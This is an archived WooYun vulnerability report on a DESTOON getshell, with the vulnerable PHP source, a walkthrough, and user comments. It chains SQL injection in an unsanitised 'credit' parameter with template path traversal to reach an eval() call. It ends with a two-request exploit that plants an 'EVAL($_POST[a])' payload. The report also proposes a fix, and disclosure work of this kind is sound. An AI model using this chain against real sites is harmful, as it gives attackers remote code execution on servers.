当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(43) 关注此漏洞

缺陷编号: WooYun-2014-78327

漏洞标题: DESTOON前台getshell

相关厂商: DESTOON

漏洞作者: Noxxx

提交时间: 2014-10-04 21:07

公开时间: 2014-12-30 14:44

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

15人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-04: 细节已通知厂商并且等待厂商处理中
2014-10-13: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-07: 细节向核心白帽子及相关领域专家公开
2014-12-17: 细节向普通白帽子公开
2014-12-27: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

如题。。

详细说明:

\module\know\answer.inc.php



143 - 161行

code 区域
case 'raise': //这个功能是 "知道功能" 悬赏的次数更新,因为默认只允许2次提高悬赏的次数


	


		if($credit < 1) dalert($L['select_credit'], 'goback');


		//这里credit 不能小于 1 


               //由于php是弱语言,所以 1xxx 这样被转换过去就变成了 1 条件也就成立了





		if($credit > $_credit) dalert($L['lack_credit'], 'goback');


		$could_raise = $could_admin;//是否是 "知道"发布的作者.





		if($item['process'] != 1) $could_raise = false;


		if($item['raise'] >= $MOD['maxraise'])  $could_raise = false;


		//$MOD['maxraise']就是最大能 “提高悬赏” 次数。


	


		if($could_raise) { //条件通过进入这个流程


			if($credit >= $MOD['raisecredit']) {


				$addtime = $DT_TIME;


				$totime = $DT_TIME + $MOD['overdays']*86400 + $MOD['raisedays']*86400;


			} else {


				$addtime = $item['addtime'];


				$totime = $item['totime'] + $MOD['raisedays']*86400;


			}


			


			$db->query("UPDATE {$table} SET credit=credit+$credit,raise=raise+1,addtime=$addtime,totime=$totime WHERE itemid=$itemid"); //看直接带入了 credit+$credit ,由于他$credit 并没有 int掉,所以导致能注入...





但是有点就是防注入绕不过去了...慢蛋疼的

safe.func.php中的

code 区域
"/select([\s\S]*?)from/i"



这个绕不过.不能子查询的话 也有没有多大的危害。于是我又找找,找到一个能提高危害等级的一段代码。



在 /module/know/show.inc.php中 (这个文件就是展示信息用的)

首先看第6行

code 区域
$item = $db->get_one("SELECT * FROM {$table} WHERE itemid=$itemid");


item是等于我们 “提问知道” 的数据。由于我们掌握了一个 update的注入点,想更新什么都行咯。



再看最后2行



code 区域
if($item['template']) $template = $item['template'];// 这个我们可以更新来达到包含的目的


include template($template, $module);//这个函数并不陌生..上次提交了个命令执行也是这个步骤







code 区域
function template($template = 'index', $dir = '') {


	global $CFG;


	$to = $dir ? DT_CACHE.'/tpl/'.$dir.'-'.$template.'.php' : DT_CACHE.'/tpl/'.$template.'.php';


	$isfileto = is_file($to);


	


	if($CFG['template_refresh'] || !$isfileto) {


		if($dir) $dir = $dir.'/';


        $from = DT_ROOT.'/template/'.$CFG['template'].'/'.$dir.$template.'.htm';


		if($CFG['template'] != 'default' && !is_file($from)) {


			$from = DT_ROOT.'/template/default/'.$dir.$template.'.htm';


		}


        if(!$isfileto || filemtime($from) > filemtime($to) || (filesize($to) == 0 && filesize($from) > 0)) {


			require_once DT_ROOT.'/include/template.func.php';


			template_compile($from, $to);


		}


	}


	return $to;


}



如果是在win下就直接可以返回路径了,

code 区域
if(!$isfileto || filemtime($from) > filemtime($to) || (filesize($to) == 0 && filesize($from) > 0)) {



这几个条件都不会成立.会 return $to;

但是在 linux下 ,是不能跳出不存在的目录的。

但是destoon很好的给我们创建了目录。

Linux:

code 区域
template_compile($from, $to);创建缓存文件。





function template_compile($from, $to) {


	$content = template_parse(file_get($from));


	file_put($to, $content);//关键是这个 file_put会帮我们创建目录,


}





function template_parse($str) {


	global $CFG;


	$str = preg_replace("/\<\!\-\-\[(.+?)\]\-\-\>/", "", $str);


	$str = preg_replace("/\<\!\-\-\{(.+?)\}\-\-\>/s", "{\\1}", $str);


	$str = preg_replace("/\{template\s+([^\}]+)\}/", "<?php include template(\\1);?>", $str);


	$str = preg_replace("/\{php\s+(.+)\}/", "<?php \\1?>", $str);


	$str = preg_replace("/\{if\s+(.+?)\}/", "<?php if(\\1) { ?>", $str);


	$str = preg_replace("/\{else\}/", "<?php } else { ?>", $str);


	$str = preg_replace("/\{elseif\s+(.+?)\}/", "<?php } else if(\\1) { ?>", $str);


	$str = preg_replace("/\{\/if\}/", "<?php } ?>\r\n", $str);


	$str = preg_replace("/\{loop\s+(\S+)\s+(\S+)\}/", "<?php if(is_array(\\1)) { foreach(\\1 as \\2) { ?>", $str);


	$str = preg_replace("/\{loop\s+(\S+)\s+(\S+)\s+(\S+)\}/", "<?php if(is_array(\\1)) { foreach(\\1 as \\2 => \\3) { ?>", $str);


	$str = preg_replace("/\{\/loop\}/", "<?php } } ?>", $str);


	$str = preg_replace("/\{([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\(([^{}]*)\))\}/", "<?php echo \\1;?>", $str);


	$str = preg_replace("/<\?php([^\?]+)\?>/es", "template_addquote('<?php\\1?>')", $str);


	$str = preg_replace("/\{(\\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\+\-\x7f-\xff]*)\}/", "<?php echo \\1;?>", $str);


	$str = preg_replace("/\{(\\$[a-zA-Z0-9_\[\]\'\"\$\x7f-\xff]+)\}/es", "template_addquote('<?php echo \\1;?>')", $str);


	$str = preg_replace("/\{([A-Z_\x7f-\xff][A-Z0-9_\x7f-\xff]*)\}/s", "<?php echo \\1;?>", $str);


	$str = preg_replace("/\'([A-Za-z]+)\[\'([A-Za-z\.]+)\'\](.?)\'/s", "'\\1[\\2]\\3'", $str);


	$str = preg_replace("/(\r?\n)\\1+/", "\\1", $str);


	$str = str_replace("\t", '', $str);


	$str = "<?php defined('IN_DESTOON') or exit('Access Denied');?>".$str;


	if($CFG['template_trim']) return strip_nr($str);


	return $str;


}





code 区域
function file_put($filename, $data) {


	dir_create(dirname($filename));	


	if(@$fp = fopen($filename, 'wb')) {


		flock($fp, LOCK_EX);


		$len = fwrite($fp, $data);


		flock($fp, LOCK_UN);


		fclose($fp);


		if(DT_CHMOD) @chmod($filename, DT_CHMOD);


		return $len;


	} else {


		return false;


	}


}









code 区域
function dir_create($path) {


	if(is_dir($path)) return true;


	if(DT_CACHE != DT_ROOT.'/file/cache' && strpos($path, DT_CACHE) !== false) {


		$dir = str_replace(DT_CACHE.'/', '', $path);


		$dir = dir_path($dir);


		$temp = explode('/', $dir);


		$cur_dir = DT_CACHE.'/';


		$max = count($temp) - 1;


		for($i = 0; $i < $max; $i++) {


			$cur_dir .= $temp[$i].'/';


			if(is_dir($cur_dir)) continue;


			@mkdir($cur_dir);


			if(DT_CHMOD) @chmod($cur_dir, DT_CHMOD);


			if(!is_file($cur_dir.'/index.html') && !is_file($cur_dir.'/index.php')) file_copy(DT_ROOT.'/file/index.html', $cur_dir.'/index.html');


		}


	} else {


		$idx = strpos($path, '/file/') !== false ? true : false;


		$dir = str_replace(DT_ROOT.'/', '', $path);


		$dir = dir_path($dir);


		$temp = explode('/', $dir);


		$cur_dir = DT_ROOT.'/';


		$max = count($temp) - 1;


		for($i = 0; $i < $max; $i++) {


			$cur_dir .= $temp[$i].'/';


			if(is_dir($cur_dir)) continue;


			@mkdir($cur_dir);


			if(DT_CHMOD) @chmod($cur_dir, DT_CHMOD);


			if($idx && !is_file($cur_dir.'/index.html') && !is_file($cur_dir.'/index.php')) file_copy(DT_ROOT.'/file/index.html', $cur_dir.'/index.html');


		}


	}


	return is_dir($path);


}





最终linbux会创建know-这个目录因为,这个$dir是know

function template($template = 'index', $dir = '')

所以不用担心在linux用/../../../跳不出去。



dir_linux.png







上次我在360提交的东就是 tag.inc.php这里执行的代码。

我们来看看,(因为这里是admin的文件,但是普通的就能包含进去始终是个很大的风险)。

在 admin/tag.inc.php。

code 区域
defined('IN_DESTOON') or exit('Access Denied');//common.inc.php 就定义了这个常量。





93-99



code 区域
$tag_code .= ';';


		$tag_safe = substr($tag_code, 5, -7);


		foreach(array('(', '`', ',', ';') as $v) {


			if(strpos($tag_safe, $v) !== false) msg('标签内容包含不安全写法,禁止在线预览');


		}


		ob_start();


		eval($tag_code);



这里似乎也没有什么限制了。

白做的安全措施 最后执行还是的$tag_code。只要$tag_code不超过特定的长度就可以了。



template需要等于:/../../../../admin/tag.inc



现在想起来

code 区域
function strip_sql($string) {


	$match = array("/union/i","/where/i","/outfile/i","/dumpfile/i","/0x([a-z0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\(\+@])/i","/update([\s\*\/\-\(\+@])/i","/replace([\s\*\/\-\(\+@])/i","/delete([\s\*\/\-\(\+@])/i","/drop([\s\*\/\-\(\+@])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i");


	$replace = array('unio&#110;','wher&#101;','outfil&#101;','dumpfil&#101;','0&#120;\\1','selec&#116;\\1from','selec&#116;\\1','updat&#101;\\1','replac&#101;\\1','delet&#101;\\1','dro&#112;\\1','load_fil&#101;(','substrin&#103;(','subst&#114;(','lef&#116;(','conca&#116;(','concat_w&#115;(','make_se&#116;(','asci&#105;(','he&#120;(','or&#100;(','cha&#114;(');


	return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);


}



似乎没有什么编码让我更新上去。。0x让实体化了,CHAR也是

那就只能先把 路径写到另外的字段了。

template就=写入的字段了

(ps:这个发布知道提问,需要管理员审核)





漏洞证明:

post1.jpg





post_2.png





post_3.png





post4.png



post5.png





执行完,会自动转跳如果页面是空白就成功了。



post7.png





EXP:

1.

**.**.**.**/destoon/member/answer.php?itemid=6&action=raise

credit=1,template=introduce

2.

**.**.**.**/destoon/know/show.php?itemid=6

action=preview&tag_code=EVAL($_POST[a]);&a=phpinfo();exit;



(post[introduce] => /../../../../admin/tag.inc)

另外还有个利用方式,参见http://**.**.**.**/bugs/wooyun-2014-067679这个

修复方案:

int掉credit.(admin目录的文件最好还是换个常量验证..)

版权声明:转载请注明来源 Noxxx@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-10-04 23:24 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    2

    关注!!

    1# 回复此人
  2. 2014-10-05 00:28 | 你大爷 ( 实习白帽子 | Rank:84 漏洞数:19 | hdjdj)
    0

    吊 洞主求抱大腿

    2# 回复此人
  3. 2014-10-05 08:01 | j14n ( 普通白帽子 | Rank:1636 漏洞数:304 | print (‘\n’.join([’ ‘.join([‘%s*%s=...)
    0

    mark

    3# 回复此人
  4. 2014-10-06 17:51 | 小.P.孩 ( 路人 | Rank:0 漏洞数:1 )
    0

    必须顶起啊!!

    4# 回复此人
  5. 2014-10-13 09:37 | ′king ( 实习白帽子 | Rank:40 漏洞数:8 | 马甲甲)
    0

    很吊 这个哥们你没选择通用啊。

    5# 回复此人
  6. 2014-10-13 09:54 | pandas ( 普通白帽子 | Rank:701 漏洞数:79 | 国家一级保护动物)
    0

    洞主功力颇深

    6# 回复此人
  7. 2014-10-13 10:24 | Noxxx ( 普通白帽子 | Rank:700 漏洞数:55 )
    0

    @′king 呃..貌似是选了的啊。。居然忽略了,,

    7# 回复此人
  8. 2014-10-13 10:43 | Noxxx ( 普通白帽子 | Rank:700 漏洞数:55 )
    0

    @pandas 小菜路过。。

    8# 回复此人
  9. 2014-12-12 11:39 | mu0u ( 路人 | Rank:2 漏洞数:1 | 先做人,后做事。)
    1

    土豪,交个朋友吧。

    9# 回复此人
  10. 2014-12-15 17:06 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    1

    @Noxxx 我能弱弱的问下。你ID怎么看的吗?我审核完了是静态地址。找不到ID

    10# 回复此人
  11. 2014-12-15 19:08 | Noxxx ( 普通白帽子 | Rank:700 漏洞数:55 )
    1

    @微尘 伪静态后面那个应该就是id了

    11# 回复此人

登录后才能发表评论,请先 登录